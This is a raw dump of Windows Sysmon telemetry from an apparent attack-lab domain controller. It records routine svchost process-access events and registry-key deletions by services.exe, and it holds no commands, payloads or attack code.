09:19:07.556{5EBD8912-79BB-6151-D177-00000000FC01}4028C:\Windows\system32\winlogon.exeHKU\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguagesBinary Data 10341000x80000000000000001052301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052297Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8284528C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8286740C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.540{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1700-00000000FC01}1448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x80000000000000001052284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_44b79eb 12241200x80000000000000001052283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_44b79eb\Security 12241200x80000000000000001052282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_44b79eb 12241200x80000000000000001052281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_44b79eb\Security 12241200x80000000000000001052280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_44b79eb 12241200x80000000000000001052279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_44b79eb\Security 12241200x80000000000000001052278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_44b79eb 12241200x80000000000000001052277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_44b79eb\Security 12241200x80000000000000001052276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_44b79eb 12241200x80000000000000001052275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_44b79eb\Security 12241200x80000000000000001052274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_44b79eb 12241200x80000000000000001052273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteKey2021-09-27 09:19:07.540{5EBD8912-7F2D-614D-0A00-00000000FC01}616C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_44b79eb\Security 10341000x80000000000000001052272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.509{5EBD8912-7F30-614D-1600-00000000FC01}12684572C:\Windows\system32\svchost.exe{5EBD8912-7F2F-614D-0C00-00000000FC01}828C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\profsvc.dll+25ed|c:\windows\system32\profsvc.dll+2374|c:\windows\system32\profsvc.dll+1efc|c:\windows\system32\profsvc.dll+297b|c:\windows\system32\profsvc.dll+7c78|c:\windows\system32\profsvc.dll+cb98|c:\windows\system32\profsvc.dll+aa7b|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.509{5EBD8912-7F30-614D-1600-00000000FC01}12684572C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1000-00000000FC01}380C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\profsvc.dll+25ed|c:\windows\system32\profsvc.dll+2374|c:\windows\system32\profsvc.dll+1efc|c:\windows\system32\profsvc.dll+297b|c:\windows\system32\profsvc.dll+7c78|c:\windows\system32\profsvc.dll+cb98|c:\windows\system32\profsvc.dll+aa7b|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.509{5EBD8912-7F30-614D-1600-00000000FC01}12684572C:\Windows\system32\svchost.exe{5EBD8912-7F2F-614D-0C00-00000000FC01}828C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\profsvc.dll+25ed|c:\windows\system32\profsvc.dll+2374|c:\windows\system32\profsvc.dll+1efc|c:\windows\system32\profsvc.dll+297b|c:\windows\system32\profsvc.dll+7c78|c:\windows\system32\profsvc.dll+cb98|c:\windows\system32\profsvc.dll+aa7b|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.509{5EBD8912-7F30-614D-1600-00000000FC01}12684572C:\Windows\system32\svchost.exe{5EBD8912-7F2F-614D-0C00-00000000FC01}828C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\profsvc.dll+25ed|c:\windows\system32\profsvc.dll+2374|c:\windows\system32\profsvc.dll+1efc|c:\windows\system32\profsvc.dll+297b|c:\windows\system32\profsvc.dll+7c78|c:\windows\system32\profsvc.dll+cb98|c:\windows\system32\profsvc.dll+aa7b|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.462{5EBD8912-7F2F-614D-0C00-00000000FC01}8282200C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 